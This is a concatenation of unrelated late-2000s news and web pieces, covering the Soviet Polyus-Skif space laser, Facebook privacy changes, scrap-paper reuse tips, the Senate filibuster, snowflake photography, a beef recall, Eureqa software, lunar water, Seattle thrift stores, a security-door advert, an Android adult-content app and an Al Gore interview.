It sounds like something from a James Bond movie : a massive satellite , the largest ever launched , equipped with a powerful laser to take out the American anti-missile shield in advance of a Soviet first strike .
It was real , though — or at least the plan was .
In fact , when Soviet President Mikhail Gorbachev walked out of the October 1986 summit in Reykjavik , Iceland , because President Ronald Reagan would n't abandon his Strategic Defense Initiative , or SDI , the Soviets were closer to fielding a space - based weapon than the United States was .
Less than a year later , as the world continued to criticize Reagan for his " Star Wars " concept , the Soviet Union launched a test satellite for its own space - based laser system , which failed to reach orbit .
Had it succeeded , the cold war might have taken a different turn .
The spacecraft was known as Polyus - Skif . " Polyus " is Russian for " pole , " as in the north pole .
" Skif " referred to the Scythians , an ancient tribe of warriors in central Asia — and the European equivalent of " barbarian . "
According to Soviet space scholar Asif Siddiqi , a historian at Fordham University in New York City , Moscow began working on space - based weapons well before Reagan kicked the U.S. program into high gear with his March 23 , 1983 Star Wars speech .
" [ The Soviets ] funded two massive R&D studies in the late 1970s and early 1980s to explore how to counter imaginary American missile defense ideas , " he says .
Two concepts emerged : Skif — a laser " cannon " in orbit — and another weapon known as Kaskad ( Cascade ) , designed to destroy an enemy 's satellites with missiles fired from another craft in orbit .
Although some details about these programs leaked out in the mid-1990s , it was not until a few years ago , says Siddiqi , that the full extent of the space weapon plans became known , even in Russia .
A former press officer in the Russian space industry , Konstantin Lantratov , pieced together the history of Polyus - Skif .
" Lantratov managed to dig deep into the story , and his research clearly shows the enormous scale of these battle station projects , " Siddiqi says .
" These were not sideline efforts ; this was a real space weapons program . "
Design work began in the 1970s , not long after the symbolic Apollo - Soyuz " handshake in space " between NASA astronauts and Soviet cosmonauts .
The famed Energia organization , which had built the Soyuz crew spacecraft as well as the giant N - 1 moon rocket , a program that between 1969 and 1972 suffered four explosions , started studying both the Skif and the Kaskad concepts in 1976 .
Initially , Energia 's plan was to use space - based weapons to shoot down American intercontinental ballistic missiles early in flight , when they were still moving relatively slowly .
The Salyut space stations , the first of which was launched in 1971 , would serve as the core for either the laser - equipped Polyus spacecraft or the missile - armed Kaskad .
The stations could be refueled in orbit and could house two cosmonauts for up to a week .
The designers quickly abandoned this plan , however , and with it the notion of having cosmonauts live on board the Polyus spacecraft .
According to Lantratov , the Soviet Ministry of Defense determined that Soviet technology was not up to the challenge of shooting down ICBMs from space , and directed that Skif and Kaskad instead be used to disable American anti-missile satellites — which did n't yet exist , and had n't even been approved .
Although the United States also had spent considerable amounts of money in the 1950s and 1960s trying to develop a missile defense system , by the mid-1970s this work was winding down , and during Jimmy Carter 's presidency , progress on anti-missile systems was minimal .
In 1972 , both superpowers had signed the Anti-Ballistic Missile Treaty , which limited each to two anti-missile launch sites , one to defend the capital city and one to defend a single base from which ICBMs could be launched .
But the ABM Treaty forbade only the deployment of anti-missile weapons , not testing or development , a loophole both sides exploited .
Beginning about 1980 , when Reagan won the presidency , scientists at the Lawrence Livermore National Laboratory in California ( among them physicist Edward Teller , the so - called father of the H - bomb ) , along with researchers at other federal labs and a handful of military and civilian policymakers , began looking at " directed energy " weapons — which shoot beams instead of bullets — as a way to neutralize an increasing Soviet advantage in launchers and strategic missiles .
Reagan was taken with the idea , and three years later , in a televised speech on national security , he announced a plan to build a defensive shield to " make nuclear weapons impotent and obsolete , " essentially changing the nation 's strategic posture from offense to defense .
The proposal was immediately attacked by Democrats in Congress , who called it unworkable ; it was the late Senator Ted Kennedy who tagged it with the moniker " Star Wars . "
Despite the skeptics , funding for missile defense increased dramatically , and reached nearly $ 3 billion a year by 1986 .
As prominent planetary scientist and Gorbachev advisor Roald Sagdeev wrote in his 1994 memoir The Making of a Soviet Scientist , " If Americans oversold [ the Strategic Defense Initiative ] , we Russians overbought it . "
In the summer after Reagan 's Star Wars speech , Under Secretary of Defense Fred Iklé requested a CIA study on how the Soviets might respond .
The work fell to three analysts , including Allen Thomson , a senior analyst working for the CIA 's Office of Scientific and Weapons Research .
Thomson had studied other Soviet military research programs , including efforts to develop directed - energy weapons and sensors for space - based submarine detection .
( CNN ) -- Facebook users will soon lose the ability to join a network of friends who live in the same area but will gain the widely desired ability to control who sees every piece of information they post .
Facebook founder Mark Zuckerberg , in an open letter to users that appeared on the site Wednesday morning , said the social networking site has outgrown the usefulness of regional networks .
" [ A ]s Facebook has grown , some of these regional networks now have millions of members and we 've concluded that this is no longer the best way for you to control your privacy , " he said in the letter .
Almost half of all Facebook users are members of at least one regional network , according to Zuckerberg .
Users can specify that some of their posts on the site only go to specific networks .
Other networks like high schools , colleges and places of employment will not be affected by the change .
In place of the geography networks , Facebook will be creating what it calls a simpler network for privacy controls .
The highlight will be the option of deciding which Facebook friends see updates , photos or other posts at the time they 're posted -- " something many of you have asked for , " Zuckerberg said .
" In addition , we 'll also be fulfilling a request made by many of you to make the privacy - settings page simpler by combining some settings , " he said .
The letter said that , in the next couple of weeks , Facebook 's roughly 350 million users will be asked to review and update their privacy settings .
A message on the site will explain the changes and take users to the page where they can update the settings , Zuckerberg said .
In the several hours after Zuckerberg 's letter was posted , more than 18,000 users had posted replies to it .
Most of the feedback appeared positive .
" Great idea ! ! " one user wrote .
" Privacy is seriously important on Facebook , I got about 800 friends that come from different groups of people and places .
Thanks . "
Others took the opportunity to write about a persistent pet issue for some users -- the desire for a " dislike " button to criticize other people 's posts .
Facebook has made no statements about whether that potentially drama - inducing feature will ever be added .
What To Do With Excess Scrap Paper
What To Do With Excess Scrap Paper
Q. I WORK AT A REAL ESTATE OFFICE .
Every week we receive flyers promoting properties .. anywhere between 500 to 1000 sheets of paper .
This is such a waste to just continually throw out in the trash …can anybody come up with a way to reuse this paper in some fashion ?
And this is just one office , this goes on at all of them …
And I ’m not one of those " greenies " either , it ’s just such waste .
Some of the flyers are colored and some shiny like magazine paper .. i know there ’s good suggestions out there .. please help .
A. I also work in a real estate office .
I usually cut the paper that we get ( the one sided ones ) into 4 quarters and we use them by the phone as scribble or note pads .
You will be amazed at how hand they come in especially if you put some by each telephone .
The are great for taking messages and the fact that we are recycling makes it all worth the while .
A . The person at the Real Estate Office that is swamped weekly by paper flyers should take a good look at the backs of the flyers .
If the backs are free of printing , etc . the paper could then be reused at their own office for information that is going to end up in a file somewhere .
Or , they might call the local schools to donate the paper to the elementary schools for art projects .
The Kindergarten , first and second graders usually are in need of paper for art projects and with the economy the way it now is , have no extra money for this .
The fancier papers would be a godsend to the teachers .
Hope this idea helps out .
Sherli
A . As a mom of two young children , I use the backs of many types of paper to cut out shapes .
Or to glue pictures that are cut out of magazines .
My oldest [ 3 ] likes to color on plain paper instead of coloring books .
So my suggestion if you do n’t know any moms or grandmas with little kids that could use them .
Contact your local day cares and elementary schools .
and maybe even the library .
Wish you were in my area .
But you gave me a great idea .
I will go and check out my local real estate offices .
And other businesses to see if they have any paper .
Thanks from AL – Sonya
A . Try the local day care … they may need paper for the children ’s ’ arts and crafts .
Also try shredding some and put it in a compost pile .
A friend of mine who is on a fixed income welcomes these as ‘ scrap ’ paper for notes and grocery lists .
Look in the want ads for craft classes … call them and ask if they can use scrap paper for paper mache ’ – Ruth
A . Why not take all those sheets of paper and drop them off at a community center which undoubtedly has childrens programs and they can put them in a box labeled " Free drawing paper " and let little ones grab a handful to color / scribble on !
SH
A. I worked at an office that saved up their stacks of office paper that was only printed on one side , cut it into 1 / 4 sheets and used it as scrap paper .
A printing company began collecting the paper and gluing stacks together so we actually had " notepads " from the reams and reams of 1 - sided printed paper .
Humane societies , kennels , stables , dog breeders LOVE shredded paper to use as animal bedding ….. see if any agencies near you could use your donations of shredded junk mail / scrap paper / newspaper .
A . If your office does n’t have a recycling plan , see if you can get one implemented .
The company I work for has white paper recycling bins which are emptied once a week .
Junk mail can certainly go into white paper recycling .
If the paper is printed on one side only , can it be recycled by using the blank side for rough drafts , can you take some home for your children to draw on , make notes on , etc. , can you shred it for packing material ?
If it is printed in color , is any of it suitable for a pediatric ward , day care , after school care , etc. to use to make collages or something ?
If it is printed on both sides can you shred it for packing material .
My husband ’s company ( very small company ) does n’t recycle white paper and several of the employees bring home used paper for children to color on , to make notes on , grocery lists on , or for rough drafts of papers for classes .
Anything that we print on the computer that is n’t going to be graded or mailed ( and sometimes even then ) is printed on quick print ( saving on ink ) and on recycled paper .
– Mary
A. I work for a law firm and when the name of the firm changed , or there were reams of dot matrix paper left over or being thrown away , I took it to my daughter ’s day care .
Kids LOVE to use paper and have things to cut out and paste from flyers .
I ’m sure just about any day care would love the donation .
A. I reuse any paper that has a blank side at my Karaoke job .
I do n’t print up fancy slips for people to write on — I just cut letter - size scrap paper into eight equal pieces and set out a stack for everyone to use .
I keep pieces that may have some writing on both sides to use myself .
I use it all up .
If it is blank on both sides , I scribble over what has been written and put it out to be used on the other side !
As for the glossy papers , you might check on artists in the area .
Many of them make their own paper and could use your unwanted scrap .
A. 1 . Cut paper in quarters & use the back for scratch paper .
2 . Use whole sheets with blank backs to run through the printer for draft copies or reports that only you will see .
3 . Are they suitable for daycare use ?
ie. can the kids color on the back ?
4. Gardeners can shred paper for compost .
5 . Shredded paper can be used for package padding — mailing , moving , etc. - Meg
A . To the lady with the real estate brochures –
If they are only one sided your local school might like to try them for painting projects as they may be less prone to leak through .
Also , some photo copy shops may be open to recycle them into note pads for anyone to use .
Check around and perhaps encourage this as a free service to people who frequent the copy shop .
Make sure you only give them the blank one sided , and do not give them any sensitive or confidential information .
A . In reply to excess ads in the real estate office .
My daughter shreds the excess paper at her office and delivers it to pet shops .
I do n’t know if the paper you have would be suitable for this , but you could enquire .
A . If the real estate person ’s paper is only printed on one side , the blank side can be used in a notebook .
At the college where I work , the students have started making notebooks from the paper in the recycling bin that ’s only been printed on one side .
They collect empty cereal boxes to make cardboard covers , by opening them out , and flattening them and cutting them to just over the 8 1/2 X 11 " size , and hole punch the left side of the covers and the paper , attach a binder ring through each hole and they have a notebook to take to class .
These have become really popular with the students – especially ones made with the kid ’s cereal covers like Coco puffs and Lucky Charms !
They ’ve even sold them for $ 1 as a fundraiser for their environmental projects on campus .
A . For the person who needs an answer to what to do with all the paper coming into her office I have a couple of suggestions .
Make " scratch paper " piles of the paper so that every person who needs paper either at work or at home can take a bunch .
Not only do the backs of junk mail paper provide endless opportunities for shopping lists , scratch paper for homework , " work - it - out " paper for when various kinds of puzzles are hard and you do n’t want to look up the answers or spend time erasing wrong ones , drawing paper , and other stuff one inveribly need to have paper for but nobody in your office will ever need to shop for paper ever again except maybe for lined paper for their kids to bring to school .
Most of the time pencils will work fine on paper but for the shiny paper only ink will show up so use pens for those .
Hope that helps a little .
A. Hi !
I teach school and reuse the other side of the above paper .
I call it " HOBO " paper because it does n’t have a home .
I have a large box that I keep it in .
When the other teacher are running off papers and mess up or run too many , this is where I get my HOBO paper .
It is great for the kids who do n’t have any paper for class because only one side is used .
I have a " HOBO " hole punch that they use to punch holes in the paper and put it in their notebook .
We do alot of graphic organizers and it is great for this as you are not using a whole good sheet of paper .
I have had great success with it – also use it to run forms off on the unused side that I need everyday – absentee , permission slips , class count , etc .
The kids all get a kick out of Mrs. Owens and her HOBO paper .
A. I also use scrap paper to make handmade paper and add foliage for interest .
– Diana
A . How about keeping a box set aside for the collection of the paper , and when full , dropping it off at your local pre-school , daycare or kindergarten .
They often love getting other " waste " such as polystyrene peanuts , bubble wrap and off cuts of timber etc. – Pippa
More Scratch Paper Idea s
Unless some legislator pulls off a last - minute double - cross , health care reform will pass the Senate this week .
Count me among those who consider this an awesome achievement .
It ’s a seriously flawed bill , we ’ll spend years if not decades fixing it , but it ’s nonetheless a huge step forward .
It was , however , a close - run thing .
And the fact that it was such a close thing shows that the Senate  and , therefore , the U.S. government as a whole  has become ominously dysfunctional .
After all , Democrats won big last year , running on a platform that put health reform front and center .
In any other advanced democracy this would have given them the mandate and the ability to make major changes .
But the need for 60 votes to cut off Senate debate and end a filibuster  a requirement that appears nowhere in the Constitution , but is simply a self - imposed rule  turned what should have been a straightforward piece of legislating into a nail - biter .
And it gave a handful of wavering senators extraordinary power to shape the bill .
Now consider what lies ahead .
We need fundamental financial reform .
We need to deal with climate change .
We need to deal with our long - run budget deficit .
What are the chances that we can do all that  or , I ’m tempted to say , any of it  if doing anything requires 60 votes in a deeply polarized Senate ?
Snowflakes , the coolest shapes on the planet are even more beautiful close up
If the recent snowfalls have left you dreaming of a white Christmas , your wish might be granted - because forecasters say we 're in for more over the next week .
And although a crisp and pristine blanket of the stuff is a wonderful sight to wake up to , snow is even more beautiful in close - up .
As these photographs show , each snowflake is a miniature masterpiece of nature : six - sided , perfectly symmetrical - and unique .
Close up :
These snowflakes were captured using a special microscope by Professor Kenneth Libbrecht
It is created in an instant out of water vapour , and vanishes just as suddenly , its pattern never to be repeated .
These amazing images were taken , using a special microscope , by physics Professor Kenneth Libbrecht , who has spent the past 11 years on a personal quest to record the beautiful world of snowflakes .
Prof Libbrecht , of the California Institute of Technology , says that the most ' basic ' snowflake pattern is the hexagonal prism - a six - sided block with little detail .
Stunning :
As these images show , no two snowflakes are the same
The flakes , which look like six ferns joined in the centre , are called , more poetically , Fernlike Stellar Dendrites .
They are the largest snow crystals ( about 5 mm ) and make the best powdery snow .
The simpler Stellar Dendrites ( up to 4 mm ) look like branches and Christmas - tree decorations are often based on this shape .
But the best thing about snowflakes ?
They all crunch pleasingly underfoot on a crisp winter morning .
Crystal clear : Each snowflake is a miniature masterpiece of nature
CHICAGO ( Reuters ) -
An Oklahoma company said it was voluntarily recalling 248,000 lbs ( 112,000 kg ) of beef products in six states following an outbreak of illnesses involving E. coli bacteria .
In a recorded telephone message , National Steak and Poultry of Owasso , Oklahoma , said it was recalling various products in Colorado , Iowa , Kansas , South Dakota , Michigan , and Washington state .
The company said it was cooperating with the U.S. Department of Agriculture ’s Food Safety and Inspection Service as a precautionary measure because some of its beef products might be linked to a series of E. coli- linked illnesses in the six states .
The company did not confirm any contaminations at its production facilities , but said it “ will err on the side of being cautious ” by recalling the products .
“ This is the first recall in our company ’s nearly 30 - year history , ” the firm said in its recorded message on a consumer hotline .
On its website ( www.nationalsteak.com/), National Steak and Poultry describes itself as " beef and poultry marination innovators since 1980 , " offering fully cooked and fresh frozen beef and poultry .
Last Friday ( Dec. 18th ) , I drove down to Macon , GA from Atlanta ( worth it - I was n't going to miss this !! ) to meet up with mi hermano & attend , which was part of the Macon Film Festival .
It was a one time event that Tony Hale agreed to do because his parents live in Macon .
Myself , Buster Bluth / Tony Hale , and my brother : Basically , Tony Hale picked his 3 favorite Arrested Development episodesand watched them with the audience , coming up on stage after each one to speak for a bit .
After watching the episodes , there was a Q&A with the audience .
He spoke about Liza Minnelli repeatedly , saying she was extremely hilarious and wonderful to be around .
I asked which TV shows are his favorites at the moment .
He answered Lost , The Office , Community , and 30 Rock ... oh yeah , but " not 24 ! ! " .
Oh , and now finally there 's some solid info on the AD movie . , and they 're currently in the process of writing the script .
I know this was reported / rumored awhile back , but I feel like it 's really confirmed now that a cast member actually said so .
When the event was over , some of us were able to get pictures with him .
He was incredibly sweet and funny .
When my brother and I went up to him to get a picture , he chatted with me for a minute and mentioned that he really loved the question I had asked .
I also inquired as to whether or not he has a Twitter ( earlier on he had been making jokes about it ) , but he said he does n't .
Yes I realize how lame I am getting so excited over all of this ... but hey , it 's Buster Bluth !
C'mon !
Oh yeah , and his real laugh is exactly the same as Buster 's .
It was too funny hearing that ...
Here 's a couple of pics of him during the Q&A : I love his expression here , it 's hilarious ... Okay so AD gifs , anyone ??
It 's been far too long !
Source : Myself
Eureqa screenshot .
Image : Cornell Computational Synthesis Lab
( PhysOrg.com ) --
A new program , Eureqa , takes raw data and formulates scientific laws to suit , and it is available by free download to all scientists .
When the program first appeared in April this year , it was fed information on a double pendulum and in just a few hours it inferred Newton 's second law of motion and the law of conservation of momentum from the data .
Given other data , it could find laws that have so far eluded scientists .
Eureqa is a successor to robots that work out how to repair themselves , which were developed at the Computational Synthesis Lab at Cornell University by Dr Hod Lipson .
The same algorithms that were used in the robots have been adapted for the analysis of any kind of data .
These algorithms may help scientists find complicated equations and laws .
The program begins by examining the data for numbers that appear to be connected , and then suggests equations that fit the connections .
Of the proposed equations most fail , but some are less wrong than others , and these are selected and modified and then repeatedly re-tested against the data and tweaked until a workable equation is identified .
In some cases there is not enough data to enable Eureqa to find equations , but in these cases the latest version of the program may identify the gaps in the data and even recommend experiments to supply the missing data .
Eureqa was able to calculate in hours equations that Newton took years to find , and Lipson hopes it can do the same for data such as the interactions between proteins , genomes and cell signals , which are so complicated that describing the interactions mathematically has so far been impossible .
While Lipson envisaged the program as having application mainly in biological fields , it will analyze any data that can be presented in a spreadsheet .
Video : Cornell Computational Synthesis Lab
Dr John Wikswo of Vanderbilt University , who is using Eureqa to study the effects of cocaine on white blood cells , said that biology is far too complicated for humans to fully understand , but the Eureqa project may find solutions .
Teamed with other gadgets developed by Lipson , Eureqa can adjust valves controlling the nutrients and toxins being fed to cells , and make changes faster than any human .
Dr Wikswo said the program not only derives the equations , but also the experiments needed to come up with the equations .
Dr Wikswo explained that scientists usually work by keeping everything constant except one variable , but that works best for linear systems and not so well for biological systems , which are more complex , and which can only be understood fully by changing many variables .
Understanding which variables to change and what the results mean can be incredibly complicated , but Eureqa should be able to help .
Eureqa was released in response to an overwhelming number of requests from scientists asking Lipson to analyze their data for them .
The program is available for free download now , but is still being refined by Lipson and his colleague Michael Schmidt .
One of the problems is its tendency to return suitable equations but with variables that are not understood .
The equations work and make accurate predictions , and must be true , but no one can understand how they work .
Lipson likens the situation to trying to explain the laws of energy conservation to mathematicians from medieval times , who did not have the vocabulary needed to understand the mathematics .
One example of this is the use of Eureqa by University of Texas Southwestern 's Dr Gurol Suel to analyze data on cell division and growth .
Eureqa developed equations , and although Dr Suel is not sure what they mean , he said the results are still useful , and can be used as a starting point for further work , and can help in the development of new hypotheses about the cells .
The next step is to devise algorithms to explain what Eureka is finding , possibly by relating the unknown concepts to those with which we are familiar .
Meanwhile , the program is freely available for download at Cornell University 's website .
More information : Eureqa page
via Wired
© 2009 PhysOrg.com
Explore further Being Isaac Newton : Computer derives natural laws from raw data
In addition , there were squiggles in the data that indicated other molecules , possibly carbon dioxide , sulfur dioxide , methane or more complex carbon - based molecules .
“ All of those are possibilities , ” Dr. Colaprete said , “ but we really need to do the work to see which ones work best . ”
Remaining in perpetual darkness like other craters near the lunar poles , the bottom of Cabeus is a frigid minus 365 degrees Fahrenheit , cold enough that anything at the bottom of such craters never leaves .
These craters are “ really like the dusty attic of the solar system , ” said Michael Wargo , the chief lunar scientist at NASA headquarters .
The Moon was once thought to be dry .
Then came hints of ice in the polar craters .
In September , scientists reported an unexpected finding that most of the surface , not just the polar regions , might be covered with a thin veneer of water .
The Lcross scientists said it was not clear how all the different readings of water related to one another , if at all .
The deposits in the lunar craters may be as informative about the Moon as ice cores from Earth ’s polar regions are about the planet ’s past climates .
Scientists want to know the source and history of whatever water they find .
It could have come from the impacts of comets , for instance , or from within the Moon .
“ Now that we know that water is there , thanks to Lcross , we can begin in earnest to go to this next set of questions , ” said Gregory T. Delory of the University of California , Berkeley .
Dr. Delory said the findings of Lcross and other spacecraft were “ painting a really surprising new picture of the Moon ; rather than a dead and unchanging world , it could be in fact a very dynamic and interesting one . ”
Want something unique , hip , classic , or functional ?
On a budget ?
Seeking the rush of finding the perfect unique thing at a price you can afford ?
Enjoy wandering and looking and serendipity ?
This walking map of thrift stores and sellers of used goods on Capitol Hill is for you .
Compiled is a map of ( mostly ) locally - owned storefronts selling used goods in Capitol Hill .
Gifts , housewares , decor , music , electronics , small furniture : whether shopping for yourself or someone else you can make a day of it to treasure hunt these spots , or just simply check out a place or two when you have some time to kill .
View Capitol Hill Seattle thrift and used goods stores in a larger map
With six spaces offering records , three hosting books , and six providing a variety , you can use this map as a starting point to checking out the functional , the eclectic , and the creative not - new goods available in the neighborhood .
I ’ve added a brief comment to a marker if I know something about the spot .
Excluded for now are clothing - focused stores .
I believe these deserve their own fashion - focused map .
However for the desperate fashionistas reading at home , a little help : start with Yelp listings for vintage and used fashion spots on Capitol Hill .
I ’ll just say right now my favorite store on this list is The Anne Bonny for their careful selection and frequently changing inventory .
A close runner up is Seattle Trading Post because it reminds me of a used goods place ( up on Aurora somewhere , I think ) that my mom would infrequently take us kids .
We ’d always find something we did n’t realize we needed until we saw it .
This little porcelain dancing girl figurine with a bobble head is only a dollar , ma !
Pleeeeze ?
UPDATE : Here ’s a printable list of the stores shown on this map , ( It is housed on Google Docs . )
Steel Security , Fire Exit Doors and Security Gates
Click here to view our residential communal door brochure
Costello Security Commercial Made to measure Steel Doorsets
Depending on your line of business , professional appearance or extra enhancement of security will both be priorities to differing degrees .
As you can see in our commercial security doors gallery , our product range has more than enough variation to provide a fitting solution that matches any commercial environment .
Experience in all sectors , giving you peace of mind
Costello Security
Installers provide a huge range of security doors to an extremely diverse range of commercial businesses , including many blue chip clients , large and small construction companies , NHS and private hospitals , government departments , local councils , architects and small and large commercial property owners .
We believe this diverse client base strongly demonstrates both the versatility and professionalism of our security service as well as the level of satisfaction that our commercial customers enjoy .
We are delighted that much of our on - going trade is generated through repeat business and keen recommendations resulting from our previous security installation , maintenance or repair work .
Key features of our commercial security doors and frames :
Made - to - measure security doors and frames
Optional glazed viewing panels , side panels and over panels
Exceptional 11 - point security locking including 4 - hinge connection with 17.5 mm bolts
Electronic locking via maglocks and keypad entry
High performance solid stainless steel lever handles
Attack resistant anti-jemmy overlap edge strip and escutcheon plates
Heavy duty stainless steel hinges certified to BS .
EN1935.2002 grade 11 standard
Industry approved Assa Sash locking system with deadlock options
3 security levels available : Strong - fix 12 , 16 & 20 with 2 hour fire rated function
Spy holes , letter boxes and door closers
Single and double panic bar options for fire exits with 3 - point security locking system
Powder coat finish to our many standard stock colours .
RAL numbers on request
Based in Banstead , Surrey , we provide industry leading commercial security door installations to customers throughout London and across the South East , encompassing Twickenham , Caterham , Crawley , Camden , Balham , Croydon , Sutton , Purley , Edgware , Harrow , Hounslow Battersea , Beckenham , St Johns Wood , Romford , Richmond , Chelsea , Epsom , Knightsbridge , Kingston upon Thames , Islington , Kensington , Leatherhead , Coulsdon , Enfield , Wimbledon , Watford , the City of London , Dorking , Woking and Reigate .
We offer high quality security doors and fire exit doors , fitted by experienced , reliable installers at very competitive prices .
If you have any security concerns or questions , please do not hesitate to contact us for a free quotation or advice !
Digby does a great job of rounding up the criticisms of outspoken Democratic Congressman Alan Grayson , who is being pilloried for such rhetorical crimes a calling Enron lobbyists " whores " ( yes , it 's an insult to whores , but that 's not what 's got some people upset ) :
You see , it 's one thing for Republicans to give speeches on the floor of the House saying that Democrats want to murder the elderly or that they plan to create sex clinics and force teenage girls to have abortions .
That is simply folksy language these people use to communicate with their people .
When Newt Gingrich blamed Susan Smith 's murdering of her own children on liberalism , Lady Frothenberg understood that it was harmless hyperbole .
When Rush Limbaugh , Sean Hannity , Glenn Beck and the rest of the conservative movement leadership say daily that Barack Obama is a black racist who hates America , it 's simply their way , and we all understand that it is just entertainment for the masses who require this type of crude stimulation .
But when one calls a former Enron lobbyist a K - Street whore on an obscure radio show , one has simply gone too far , sirrah , and it will not be tolerated .
There will be a town hall meeting this evening led by Pastor Dick Cheney to discuss the possibility of witches in the village and what types of enhanced interrogation might be used to determine the breadth of the infiltration .
Our deep sense of decency , morality and civility demand it .
And thank you once again , Lady Frothenberg , for bringing this egregious breach of proper behavior to our attention .
Whatever the rest of you do , do n't encourage this miscreant Alan Grayson to do more of this boorish behavior by donating money at his crude web site : Congressmanwithguts.com .
If you do , I certainly hope you do n't plan on being invited into the any of the finer homes and establishments in the Village because you just are n't welcome there !
Apparently overseas postage " costs a crap ton of money " according to the truly sweet handwritten letter I got . :)
So my SS decided to make two handmade mugs out of duct tape .
According to the letter , one is apparently a beer mug and the other a form of bottle .
They were unfortunately completely unusable though , as they were a bit squashed and leaks like sprinklers .
Also I got one dollar " just for something neat " according to the letter .
It actually is .
I 'll save it until the US gets a decent economy before I cash it in . ;)
Thanks SS .
Users of Android - based smartphones now have access to an app that provides a service unattainable from any of the 100,000 - plus offerings in the iPhone App Store .
Porn .
MiKandi , a Seattle , Washington start - up , is offering its eponymous app not through Google 's own Android Market , but from its own website , downloadable free when accessed through the Android browser .
Google , like Apple , vets apps offered through its online store but , unlike Apple , the company also allows you to install non-vetted apps as you see fit .
Which is the tack that the MiKandi crew is taking .
Apple may be justly criticized for its seemingly arbitrary app - approval process , but one thing is certain : jiggling jubblies and ham - slamming movies of the beast with two backs need not apply .
And so MiKandi is taking its adults - only wares to the Android ( lowercase " m " ) market - although the company notes that the same fleshy opportunities will be offered for other devices soon .
You can get to MiKandi 's first base if you 're an iPhone user ( left ) - but that 's as far as you 'll go ( right )
Porn has a long and honorable tradition of aiding the adoption of many a technology , from Polaroid cameras to VHS tapes to DVDs to the web itself .
It can be argued , in fact , that the personal computer itself might owe some measure of its universality to its versatility as a home pornograph .
But will an Android porn app help Googlephones lick the iPhone 's swelling market share ?
We doubt it .
Although Apple 's bluenosedness prevents an iPhone app from inspiring one - handed iPhone viewing , such edification and enjoyment is freely available through the iPhone 's Safari browser .
A quick Google search for small - screen salaciousness turns up dozens of Safari skin flickers , including such worthies as Pocket Sized Porn , PornHub.com , iPhone Porn GridXL , and iPinkVisual - which has the unambiguous if self - congratulatory tagline of " We innovate .
You masturbate . "
But that 's not stopping the worthies at MiKandi .
Their business bet is to be a bonking bazaar , providing porn peddlers a place to share their wares with woodsman wannabes worldwide .
And they 're hiring .
If you 're in the Great Northwest and you 're a coder , designer , or marketeer , MiKandi wants to talk with you .
But be forewarned .
As their somewhat salaciously named Open Positions job board says , " Due to the adult content of our products , self - righteous , ignorant and / or annoying people need not apply . " ®
Together with our friends at agencyspy we 're looking for the worst ads released in 2009 .
If you have anything on mind , please nominate them !
Example :
Thanks !
Perhaps the best way to understand the extraordinary transformation of Al Gore is to study the changing rhetoric of his enemies .
A mere nine years ago , back when George Bush was just a cheeky rogue with an adorable line in malapropisms , presidential candidate Gore was famously derided as wooden and dull .
Having failed to win the presidency – though of course that depends , as ever , on your definition of the word " win " – he next became a pitiable loser , then a laughable climate - change wonk , then the Oscar - winning , peace prize - winning , Live Earth - organising darling of liberal Hollywood .
And so it says something hugely flattering about his present - day stature , surely , that the new official anti-Gore line is that he is quite simply evil : an anti-American hypocrite , a supporter of world government , and , like Barack Obama , probably a communist or a fascist or both .
A recent documentary about Gore made by Irish global warming denialists , Not Evil Just Wrong , made the mistake of diverging from this stance , prompting fury among parts of its intended audience in the US .
Not evil ?
Get real .
In person , Gore is neither wooden nor , in any obvious way , evil .
What he is , is reserved : settling back into an armchair at a fancy hotel in Los Angeles , he answers questions obligingly and at length – sometimes at very great length – but without the effort to connect that seems to be a compulsion of most politicians .
He is trim , strikingly handsome , in a dark blue suit and black cowboy boots , and looks mysteriously unsleepy , despite having just flown in from a three - day trip to China .
( After LA , he 's due home for one night in Nashville , then off on a book tour that will take him to South Africa and Egypt .
Denialists enjoy attacking Gore 's personal carbon footprint , even though , as denialists , it 's not clear what they 're objecting to . )
Not long ago , Time magazine called him " improbably charismatic " , which is accurate , though this may be a consequence of his new incarnation : for a successful politician , Gore comes across as surprisingly distant , but as professorial climate change experts go , he 's a rock star .
Gore , optimistically , attributes the hardening tone of his critics to " the sunset phenomenon , where there 's a spectacle just before the subsiding " : as the remaining climate change doubters and vested interests begin to realise that the game is up , he suggests , they 're bound to make one last stand .
" This self - interest on the part of some of the carbon polluters – who are becoming a bit intense in their efforts – reflects their awareness that public opinion has been shifting very significantly , " he says .
" When I say ' they ' , I do n't mean to indict all of them , because the business community is now very much split … but that realisation has produced a desire on the part of some of these carbon polluters to dig in their heels . "
He points to the US Chamber of Commerce 's new hardline stance against action on the environment , which prompted several major American corporations to resign from it .
( They included Apple , on whose board Gore sits , though he says he first heard of that decision when he read about it in the paper . )
" They 're calling for a new Scopes trial , " says Gore , referring to the Chamber 's efforts to liken a belief in global warming to creationism .
" Ha !
The Scopes trial happened in my home state , and I can tell you , one was quite enough . "
But many firms are beginning to take a different approach , he notes , for example those who have joined the 10:10 campaign in the UK , which is supported by the Guardian ; Gore calls 10:10 " brilliant " , and sees no reason why it could n't work in the US , too .
Gore 's new book , Our Choice : A Plan To Solve The Climate Crisis , gives global warming deniers short shrift , and shows little concern for displays of political bipartisanship : he likens the doubters to the " birthers " intent on proving that Obama is a Kenyan – not just mavericks , but fantasists who inhabit a different version of reality .
" The golden thread of reason that used to be stretched taut to mark the boundary between the known and the unknown is now routinely disrespected , " he writes , in a typically Goreish sentence , immediately prior to quoting Theodor Adorno , King Solomon and Aesop .
Primarily , though , Our Choice is a sumptuously illustrated coffee - table book of potential solutions , explaining both Gore 's favourites ( geothermal energy , biochar , " smart " electrical grids ) and those about which he 's deeply sceptical ( nuclear power , carbon capture and pumping sulphur dioxide into the stratosphere , a plan he describes as " insane " ) .
When making his Oscar - winning 2006 documentary , An Inconvenient Truth , Gore arguably had it easy : it 's fairly straightforward to grip an audience when you 're portraying scenes of apocalyptic destruction .
The new book pulls off a considerably more impressive feat .
It focuses on solving the crisis , yet manages to be absorbing on a topic that is all too often – can we just come clean about this , please ?
– crushingly boring .
Importantly , it seeks to enlist readers as political advocates for the cause , rather than just urging them to turn down the heating .
" It 's important to change lightbulbs , " he says , in a well - burnished soundbite , " but more important to change policies and laws . "
Or perhaps to break laws instead : peaceful occupations of the kind witnessed recently in the UK , he predicts , are only going to become more widespread .
" Civil disobedience has an honourable history , and when the urgency and moral clarity cross a certain threshold , then I think that civil disobedience is quite understandable , and it has a role to play .
And I expect that it will increase , no question about it . "
People sometimes express incredulity that Gore , who was groomed for the presidency almost since birth , seems so resolved that he 'll never return to electoral politics .
But here 's a vivid example of the benefits of life on the outside : how many serving politicians would feel able to come so close to urging people to commit trespass ?
